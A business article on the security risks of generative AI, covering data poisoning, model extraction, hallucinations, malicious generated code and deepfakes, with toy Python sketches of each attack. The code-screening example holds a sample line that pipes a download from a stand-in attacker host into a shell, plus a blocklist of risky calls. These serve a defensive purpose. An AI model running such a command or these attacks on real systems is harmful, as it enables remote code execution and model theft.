Identify Generative AI’s Inherent Risks to Protect Your Business
Generative AI is the hot topic of the moment, but it’s not without risks to your enterprise. We explain the vulnerabilities and what you can do to guard against them.
- By Neil Serebryany
- September 5, 2023
Generative artificial intelligence (or simply generative AI) is one of the more recent tech developments revolutionizing the way organizations function. At the user’s request, generative AI models produce new media -- text, video, audio, etc. -- derived from huge data sets used to train them. These multimodal models, which include ChatGPT, Midjourney, and Voicebox (among others), are streamlining processes, automating repetitive tasks, and analyzing and synthesizing vast amounts of data, which increases productivity and efficiency, enhances decision-making, and drives innovation.
From banks, insurance companies, and law firms to advertising agencies, biotech startups, retail chains, and major research universities, generative AI models are leading decision-makers to reconsider the “standard” way of doing things.
The potential for further advancements in this area is an exciting prospect, but the new risks these models pose to revenue streams, data, operations, and cloud and physical infrastructure (and more) cannot be overlooked. In the chaotic rush to adopt generative AI, one step too often skipped is developing a strategy for incorporating these powerful tools into the organization's ecosystem. Without one, a very rocky road is all but guaranteed.
A robust AI security strategy must consider the benefits and risks these powerful AI-based tools can bring to the organization as well as how these tools will be used, by whom, and for what purpose. These questions matter because many (perhaps most) threats depend on the humans in the mix -- whether that is an employee who unknowingly clicks a link that introduces a technical vulnerability, a security team that fails to foresee a human vulnerability, or a hacker who is actively creating vulnerabilities.
Introduction of a Technical Vulnerability
Even generative AI models that are meticulously developed and rigorously tested can harbor technical vulnerabilities that, if exploited, can harm any entity using the model. Consider a typical company network: it could have a "backdoor" into the system -- that's the technical vulnerability, whether or not the security team knows it's there. The backdoor's existence is one part of the problem, but when a hacker finds it and uses it to gain access to the system, the organization is in trouble. The situation with generative AI models is similar but has a few significant differences.
Generative AI models present three primary attack surfaces: the architecture of the model itself, the data it was trained on, and the data fed into it by end users. Data poisoning, for example, targets the second of these: if the training pipeline has a security flaw that leaves it open to manipulation, threat actors can inject incorrect or misleading information into the training data, which the model uses to generate responses. The result is inaccurate information presented as accurate by a trusted model and, subsequently, flawed decision-making. Adversarial attacks, by contrast, manipulate the inputs fed to a deployed model to provoke incorrect outputs.
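The mechanics of data poisoning can be seen in a deliberately tiny sketch. The word-count "model" and review data below are hypothetical toys, not any production system; the point is that a handful of mislabeled examples slipped into the training set is enough to flip what the model confidently reports.

```python
from collections import Counter

def train(examples):
    """Train a toy sentiment 'model': count how often each word
    appears under each label in the training examples."""
    counts = {"positive": Counter(), "negative": Counter()}
    for text, label in examples:
        counts[label].update(text.lower().split())
    return counts

def classify(model, text):
    """Label text by whichever class its words appeared under more often."""
    words = text.lower().split()
    pos = sum(model["positive"][w] for w in words)
    neg = sum(model["negative"][w] for w in words)
    return "positive" if pos >= neg else "negative"

# Clean training data: "refund" appears only in negative reviews.
clean = [
    ("great product fast shipping", "positive"),
    ("refund process was a nightmare", "negative"),
    ("refund took months terrible support", "negative"),
]

# An attacker poisons the pipeline with a few mislabeled examples.
poisoned = clean + [
    ("refund refund refund excellent", "positive"),
    ("refund refund refund wonderful", "positive"),
]

print(classify(train(clean), "I want a refund"))     # negative
print(classify(train(poisoned), "I want a refund"))  # positive
```

The same query now produces the opposite answer, and nothing about the model's interface reveals that its training data was tampered with.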
Model extraction attacks depend on the skill of the hacker to compromise the model itself. The threat actor repeatedly queries the model to infer its structure and behavior. One goal of this sort of attack could be reverse-engineering the model's training data -- for instance, private customer data -- or recreating the model itself for nefarious purposes.
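A minimal sketch shows why query access alone can be enough. The "proprietary" scoring model and its secret threshold below are hypothetical stand-ins for a real black-box system; the attacker never sees the internals, yet a short sequence of probes recovers the decision boundary and yields a working clone.

```python
def make_black_box(secret_threshold):
    """A proprietary scoring model the attacker can query but not inspect:
    approves any application whose score meets a secret threshold."""
    def model(score):
        return "approved" if score >= secret_threshold else "denied"
    return model

def extract_threshold(model, lo=0, hi=1000):
    """Recover the secret threshold in ~log2(hi - lo) queries by
    binary-searching for the decision boundary."""
    while lo < hi:
        mid = (lo + hi) // 2
        if model(mid) == "approved":
            hi = mid          # threshold is at or below mid
        else:
            lo = mid + 1      # threshold is above mid
    return lo

victim = make_black_box(secret_threshold=720)
stolen = extract_threshold(victim)
clone = make_black_box(stolen)  # behaves identically to the victim

print(stolen)  # 720
print(all(victim(s) == clone(s) for s in range(0, 1001)))  # True
```

Real models have far more parameters than one threshold, but the principle scales: enough well-chosen queries let an attacker approximate the model's behavior without ever touching its code or weights.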
Notably, any of these attacks can take place before or after the model is installed at a user site. They can be carried out silently and stealthily, avoiding detection for weeks or months, all the while potentially affecting system security, data integrity, investment or operational strategies, the safety of physical infrastructure, and revenue streams. As with a malware attack, standard security protocols, such as access controls and user authentication, won’t do much to prevent damage once a destructive element has been introduced to the system, however inadvertently.
Failing to Foresee Potential Human Vulnerabilities
Exploitable human vulnerabilities are a wide-open category. They range from a mindless click on a link in a large language model's (LLM's) response that turns out to be the first step of a malicious attack, to the less technical (but potentially equally damaging) error made by a person who doesn't fully understand how generative AI models work. Essentially, these models reassemble data, but sometimes responses are so thoroughly "generated" that they are made-up nonsense that comes across as real. Such responses are known as "hallucinations" and can cause issues for users who trust the model's output without verifying it.
These situations can provoke real consequences for a company, from data loss or system damage to reputational damage and loss of customer confidence. Likewise, if prompts contain words or phrases parsed in certain ways, the responses can be significantly different than if the prompts had been written more carefully or had not included certain words. The information returned in such cases can be factually accurate and verifiable but contextually skewed, thus leading to issues such as strategic decisions being built on a faulty foundation.
LLMs are more consistently identifying biased, stereotypical, and toxic terms and phraseology, pushing back by not providing responses to prompts that include them -- but they have a long way to go. Human ownership of the outgoing content and accountability for incoming content are key issues to consider, and automated review and verification are on the near horizon. If an organization only has a standard security setup, employee education and training will be the critical, but not necessarily easy or convenient, solution to forestalling human vulnerabilities.
Not Thinking Like a Hacker Actively Creating Vulnerabilities
This threat is a hybrid of the other two because we're talking about code, which, by default, means nothing happens organically or completely by accident. There is always a human coder who wrote the commands that created the vulnerability that infected a system, stole data, or triggered a series of events. To be clear, code "generated" by an LLM or other generative AI model is typically derived from existing code that's already "out there" -- reassembled by the model or, in some cases, reproduced nearly verbatim.
The burden is on a user to understand any generated code as well as what it can do. If a user who is not a proficient coder (or not a coder at all) asks the model whether the code contains malicious commands, the odds are probably even that the response will be wrong, no matter the answer. That’s neither a feature nor a bug; it’s just reality. The model is a non-sentient, software-driven system that has no values or conscience and doesn’t care if the code is malicious; it exists to respond to prompts. The person installing the code without knowing that it’s safe is an insider threat with access to organizational assets.
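One practical mitigation is to screen generated code before anyone runs it. The sketch below uses Python's standard `ast` module for a naive static check; the blocklist is hypothetical and far from exhaustive, so this is an illustration of the idea, not a substitute for review by a proficient coder.

```python
import ast

# Calls that warrant human review before generated code is executed.
# This blocklist is illustrative only; real screening needs far more.
SUSPICIOUS_CALLS = {"eval", "exec", "system", "popen", "rmtree"}

def flag_suspicious_calls(source):
    """Parse generated code and list any calls to blocklisted names,
    without executing anything."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            name = getattr(func, "id", None) or getattr(func, "attr", None)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return findings

# Hypothetical model output pasted in for screening.
generated = """\
import os
data = open('config.txt').read()
os.system('curl http://attacker.example | sh')
"""

print(flag_suspicious_calls(generated))  # [(3, 'system')]
```

A check like this catches only the crudest cases -- obfuscated or indirect calls will slip through -- which is exactly why generated code still needs a human reviewer who understands what it does.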
Deepfakes are another type of content generated by an LLM or other generative AI model that can harm an enterprise. Done well, deepfakes are extraordinarily convincing photographic, audio, or video imitations of real people and are more difficult to detect with every iteration of software. The technology is quite impressive -- and incredibly dangerous.
If people believe a deepfake is real, the result could be reputational harm to your enterprise or its leaders if they are "shown" saying, doing, or supporting unethical, illegal, or otherwise damaging things. It puts the organization in the difficult position of having to prove a negative in the face of very persuasive "proof." As for fake written content, disinformation and misinformation -- such as fabricated news articles and social media posts -- have arguably already won the battle for hearts and minds.
Planning for Success While Bracing for a Crisis
Generative AI models represent an enormous leap forward for society, with all the attendant risks great advances bring. Running away from these models out of fear of those risks is not a plan any more than is running toward them without acknowledging the risks. By all means, adopt, deploy, and innovate -- but prepare for possible negative effects. Take proactive measures to protect and mitigate risks to your organization, employees, customers, and shareholders, and have a plan for responding effectively if they become victims of misinformation or malicious use of such content.
Here are a few proactive steps your organization can take.
- Make informed decisions by understanding who in your organization will be using the model and to what ends.
- Study the offerings available; not all LLMs are the same. They are made by different teams and companies and are trained on different data sets. Some, such as ChatGPT, are “conversant” and others, such as Cohere, are not. Some are industry-specific, such as Harvey and BloombergGPT.
- Be confident of the model’s suitability for your specific use case(s) and understand its level of robustness and accuracy. One way to do this is to work with the vendors or run an in-house pilot program to enable your team to effectively identify potential risks and vulnerabilities associated with the model and understand its behavior.
- Educate your staff about the risks of using generative AI tools, including what to do and what not to do when submitting queries and reviewing responses.
- Educate your customers about the chatbots or virtual assistants used on your website or mobile apps. Ensure that they know what information they should and should not enter.
Taking steps such as these can help ensure the security of your generative AI ecosystem and foster transparency and trust with stakeholders.